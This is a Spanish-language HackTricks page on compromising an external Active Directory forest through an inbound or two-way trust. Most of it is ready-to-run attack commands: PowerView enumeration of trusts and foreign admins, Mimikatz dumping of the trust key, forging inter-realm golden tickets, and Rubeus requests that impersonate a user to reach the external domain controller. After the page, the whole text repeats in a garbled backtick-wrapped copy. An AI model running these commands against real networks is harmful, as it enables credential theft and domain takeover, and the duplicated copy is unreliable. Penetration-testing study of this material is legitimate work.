hacktricks/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md

# Dominio Forestal Externo - Unidireccional (Entrante) o bidireccional

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección de exclusivos [**NFTs**](https://opensea.io/collection/the-peass-family)
* Consigue el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PR al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

En este escenario, un dominio externo confía en ti (o ambos confían entre sí), por lo que puedes obtener algún tipo de acceso sobre él.

## Enumeración

En primer lugar, debes **enumerar** la **confianza**:
```powershell
Get-DomainTrust
SourceName      : a.domain.local   --> Current domain
TargetName      : domain.external  --> Destination domain
TrustType       : WINDOWS-ACTIVE_DIRECTORY
TrustAttributes : 
TrustDirection  : Inbound          --> Inboud trust
WhenCreated     : 2/19/2021 10:50:56 PM
WhenChanged     : 2/19/2021 10:50:56 PM

# Get name of DC of the other domain
Get-DomainComputer -Domain domain.external -Properties DNSHostName
dnshostname           
-----------           
dc.domain.external

# Groups that contain users outside of its domain and return its members
Get-DomainForeignGroupMember -Domain domain.external
GroupDomain             : domain.external
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=domain,DC=external
MemberDomain            : domain.external
MemberName              : S-1-5-21-3263068140-2042698922-2891547269-1133
MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,
                          DC=external

# Get name of the principal in the current domain member of the cross-domain group
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\External Admins

# Get members of the cros-domain group
Get-DomainGroupMember -Identity "External Admins" | select MemberName
MemberName
----------
crossuser

# Lets list groups members
## Check how the "External Admins" is part of the Administrators group in that DC
Get-NetLocalGroupMember -ComputerName dc.domain.external
ComputerName : dc.domain.external
GroupName    : Administrators
MemberName   : SUB\External Admins
SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup      : True
IsDomain     : True

# You may also enumerate where foreign groups and/or users have been assigned 
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
```
En la enumeración previa se encontró que el usuario **`crossuser`** está dentro del grupo **`External Admins`** que tiene acceso de **Administrador** dentro del **DC del dominio externo**.

## Acceso inicial

Si **no pudiste** encontrar ningún acceso **especial** de tu usuario en el otro dominio, aún puedes volver a la Metodología de AD e intentar hacer **escalada de privilegios desde un usuario sin privilegios** (cosas como kerberoasting, por ejemplo):

Puedes usar las funciones de **Powerview** para **enumerar** el **otro dominio** usando el parámetro `-Domain` como en:
```powershell
Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName
```
## Suplantación de identidad

### Inicio de sesión

Utilizando un método regular con las credenciales del usuario que tiene acceso al dominio externo, deberías ser capaz de acceder:
```powershell
Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator
```
### Abuso de SID History

También se puede abusar de [**SID History**](sid-history-injection.md) a través de una confianza entre bosques.

Si un usuario es migrado **de un bosque a otro** y **no se ha habilitado el filtrado de SID**, se vuelve posible **agregar un SID del otro bosque**, y este **SID** será **agregado** al **token del usuario** al autenticar **a través de la confianza**.

{% hint style="warning" %}
Como recordatorio, se puede obtener la clave de firma con
```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local
```
{% endhint %}

Se podría **firmar con** la clave **confiable** un **TGT suplantando** al usuario del dominio actual.
```bash
# Get a TGT for the cross-domain privileged user to the other domain
Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap

# Now you have a TGS to access the CIFS service of the domain controller
```
### Impersonación completa del usuario
```bash
# Get a TGT of the user with cross-domain permissions
Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap

# Get a TGT from the current domain for the target domain for the user
Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap

# Now you have a TGS to access the CIFS service of the domain controller
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén la [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
f 2023-06-05 18:33:24 +00:00			`# Dominio Forestal Externo - Unidireccional (Entrante) o bidireccional`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección de exclusivos [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Consigue el [swag oficial de PEASS y HackTricks](https://peass.creator-spring.com)`
			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Comparte tus trucos de hacking enviando PR al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`

			`En este escenario, un dominio externo confía en ti (o ambos confían entre sí), por lo que puedes obtener algún tipo de acceso sobre él.`

			`## Enumeración`

			`En primer lugar, debes enumerar la confianza:`
			```powershell
			`Get-DomainTrust`
			`SourceName : a.domain.local --> Current domain`
			`TargetName : domain.external --> Destination domain`
			`TrustType : WINDOWS-ACTIVE_DIRECTORY`
			`TrustAttributes :`
			`TrustDirection : Inbound --> Inboud trust`
			`WhenCreated : 2/19/2021 10:50:56 PM`
			`WhenChanged : 2/19/2021 10:50:56 PM`

			`# Get name of DC of the other domain`
			`Get-DomainComputer -Domain domain.external -Properties DNSHostName`
			`dnshostname`
			`-----------`
			`dc.domain.external`

			`# Groups that contain users outside of its domain and return its members`
			`Get-DomainForeignGroupMember -Domain domain.external`
			`GroupDomain : domain.external`
			`GroupName : Administrators`
			`GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=domain,DC=external`
			`MemberDomain : domain.external`
			`MemberName : S-1-5-21-3263068140-2042698922-2891547269-1133`
			`MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,`
			`DC=external`

			`# Get name of the principal in the current domain member of the cross-domain group`
			`ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133`
			`DEV\External Admins`

			`# Get members of the cros-domain group`
			`Get-DomainGroupMember -Identity "External Admins" \| select MemberName`
			`MemberName`
			`----------`
			`crossuser`

			`# Lets list groups members`
			`## Check how the "External Admins" is part of the Administrators group in that DC`
			`Get-NetLocalGroupMember -ComputerName dc.domain.external`
			`ComputerName : dc.domain.external`
			`GroupName : Administrators`
			`MemberName : SUB\External Admins`
			`SID : S-1-5-21-3263068140-2042698922-2891547269-1133`
			`IsGroup : True`
			`IsDomain : True`

			`# You may also enumerate where foreign groups and/or users have been assigned`
			`# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.`
			```
			En la enumeración previa se encontró que el usuario `crossuser` está dentro del grupo `External Admins` que tiene acceso de Administrador dentro del DC del dominio externo.

			`## Acceso inicial`

			`Si no pudiste encontrar ningún acceso especial de tu usuario en el otro dominio, aún puedes volver a la Metodología de AD e intentar hacer escalada de privilegios desde un usuario sin privilegios (cosas como kerberoasting, por ejemplo):`

			Puedes usar las funciones de Powerview para enumerar el otro dominio usando el parámetro `-Domain` como en:
			```powershell
			`Get-DomainUser -SPN -Domain domain_name.local \| select SamAccountName`
			```
			`## Suplantación de identidad`

			`### Inicio de sesión`

			`Utilizando un método regular con las credenciales del usuario que tiene acceso al dominio externo, deberías ser capaz de acceder:`
			```powershell
			`Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator`
			```
			`### Abuso de SID History`

			`También se puede abusar de [SID History](sid-history-injection.md) a través de una confianza entre bosques.`

			`Si un usuario es migrado de un bosque a otro y no se ha habilitado el filtrado de SID, se vuelve posible agregar un SID del otro bosque, y este SID será agregado al token del usuario al autenticar a través de la confianza.`

			`{% hint style="warning" %}`
			`Como recordatorio, se puede obtener la clave de firma con`
			```powershell
			`Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local`
			```
			`{% endhint %}`

			`Se podría firmar con la clave confiable un TGT suplantando al usuario del dominio actual.`
			```bash
			`# Get a TGT for the cross-domain privileged user to the other domain`
			`Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'`

			`# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC`
			`## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group`
			`Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap`

			`# Now you have a TGS to access the CIFS service of the domain controller`
			```
			`### Impersonación completa del usuario`
			```bash
			`# Get a TGT of the user with cross-domain permissions`
			`Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap`

			`# Get a TGT from the current domain for the target domain for the user`
			`Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap`

			`# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC`
			`## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group`
			`Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap`

			`# Now you have a TGS to access the CIFS service of the domain controller`
			```
			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Obtén la [oficial PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Únete al [💬](https://emojipedia.org/speech-balloon/) grupo de Discord o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`